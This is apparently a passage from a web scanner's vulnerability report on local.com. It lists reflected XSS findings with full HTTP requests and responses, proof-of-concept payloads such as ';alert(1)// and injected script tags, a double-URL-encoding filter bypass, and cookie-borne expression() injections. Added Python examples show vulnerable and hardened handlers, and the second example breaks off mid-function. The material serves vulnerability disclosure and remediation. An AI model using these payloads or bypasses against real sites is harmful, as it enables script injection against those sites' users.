Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

1.469. http://www.local.com/dart/ [t parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour shows that the single quote and semicolon survive unencoded, so a JavaScript string literal that receives this value could be terminated. The scanner found no full proof-of-concept for executing arbitrary JavaScript from this position, which is why the confidence is Firm rather than Certain. Check the context by hand: the response snippet below places the echo inside the double-quoted src attribute of a script element, where a single quote closes nothing, whereas finding 1.468 shows the same t parameter breaking out of a double-quoted attribute value. Look for input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.470. http://www.local.com/dart/ [zone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that the complete payload is reflected unmodified, which is what the Certain rating records. In the response snippet below the echo lands inside the double-quoted src attribute of a script element, where the injected single quote closes no JavaScript string, so confirm in a browser that the payload actually executes before treating this finding as proven.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

1.471. http://www.local.com/dart/ [zone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
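Findings 1.470 and 1.471 both come down to the order of operations: the filter inspects the value after the web server's single URL-decode, and the application then decodes it a second time before writing it into the script src, so `%2527` passes the check and becomes a quote afterwards. The following added example (my code, not part of the report or of local.com) models that handler beside a hardened one that canonicalises first and validates afterwards. The blocked-character set, the zone-name allowlist and the shape of the rendered `<script>` tag are assumptions chosen to reproduce the behaviour the report shows; the sample payloads are the ones submitted for finding 1.470.

```python
import html
import re
from urllib.parse import unquote

# Characters the application's filter rejects. Its real blocklist is not
# published; this set is an assumption that reproduces the observed behaviour.
BLOCKED = set('<>"\'')
# Assumed allowlist for a DART zone name such as locm.sp/retail_banks_15020100.
ZONE_OK = re.compile(r"^[A-Za-z0-9._/-]+$")


def framework_decode(raw: str) -> str:
    """The web server URL-decodes each query-string value exactly once before
    the application reads it. 'raw' is the value as it appears on the wire."""
    return unquote(raw)


def render(zone: str) -> str:
    """The sink: the zone value becomes part of a <script> tag's src (assumed shape)."""
    return (f'<script language="JavaScript" src="http://ad.doubleclick.net/adj/{zone};'
            f'dcopt=ist;kw=banks" type="text/javascript"></script>')


def vulnerable_zone(raw: str):
    """Validate, then decode again: the ordering bug behind findings 1.470/1.471."""
    value = framework_decode(raw)
    if any(c in BLOCKED for c in value):
        return None                      # single-encoded payloads are caught here
    value = unquote(value)               # custom second decode AFTER validation
    return render(value)


def canonicalise(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing, so validation sees its final form.
    Values that need more layers than max_rounds are rejected outright."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def hardened_zone(raw: str):
    """Canonicalise first, validate against an allowlist, then encode for the sink."""
    try:
        value = canonicalise(framework_decode(raw))
    except ValueError:
        return None
    if not ZONE_OK.fullmatch(value):
        return None
    return render(html.escape(value, quote=True))


# Sample inputs as they appear on the wire (constructed from finding 1.470).
ZONE = "locm.sp%2fretail_banks_15020100"
SINGLE = ZONE + "fc52c%27%3balert%281%29%2f%2fd85ccbd701b"             # one encoding layer
DOUBLE = ZONE + "fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b"  # two layers, as submitted

if __name__ == "__main__":
    print("single-encoded, vulnerable:", vulnerable_zone(SINGLE))
    print("double-encoded, vulnerable:", vulnerable_zone(DOUBLE))
    print("double-encoded, hardened:  ", hardened_zone(DOUBLE))
    print("clean zone, hardened:      ", hardened_zone(ZONE))
```

The vulnerable handler rejects the single-encoded payload and emits the double-encoded one with `';alert(1)//` intact; the hardened handler rejects both because the allowlist is applied to the fully decoded value, and still renders a legitimate zone name.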

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92920
Date: Thu, 03 Feb 2011 16:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:57 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=music&8c9e7'-alert(1)-'22f4ee6710f=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87882
Date: Thu, 03 Feb 2011 16:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:17 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 89105
Date: Thu, 03 Feb 2011 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 89105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=sports&66d6b'-alert(1)-'8080df3d42=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.475. http://www.local.com/results.aspx [cid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour shows that the double quote and semicolon survive unencoded: in the response below the value lands in the literal s.campaign = "..." inside a script block, so the literal is closed and whatever follows it is parsed as JavaScript. The scanner found no full proof-of-concept for executing arbitrary JavaScript from this position, which is why the confidence is Firm rather than Certain; examine the application manually for input validation or other obstacles that may be in place. Note also that the same value is written into the localcom and localcom_s cookies (see the Set-Cookie headers below), so a payload supplied once in cid is re-emitted on later requests.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
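The remediation text repeated for findings 1.467, 1.469, 1.472 to 1.475 says to avoid echoing user data into script context; where that is not possible, the value has to be encoded for the exact context it lands in, and attribute context (findings 1.468, 1.476) needs a different encoding again. The following added example (my code, not part of the report or of local.com) shows both sinks from the cid findings rendered raw and then with context-specific encoding: the s.campaign string literal is taken from the response under 1.475, while the href attribute sink is an assumption standing in for the attribute reflection that 1.476 reports. The JavaScript encoder escapes every non-alphanumeric character as \xHH or \uHHHH, which is inert in single- and double-quoted literals alike, and a small decoder confirms the engine still receives the original value.

```python
import html
import re


def js_string_encode(value: str) -> str:
    """Encode a value for the inside of a quoted JavaScript string literal.
    Everything except ASCII letters and digits becomes \\xHH (or \\uHHHH), so no
    quote, ';', '/', '<' or line terminator can close the literal or the
    surrounding <script> element, whichever quote style the template uses."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def js_string_decode(literal_body: str) -> str:
    """What a JavaScript engine makes of the encoded literal (round-trip check)."""
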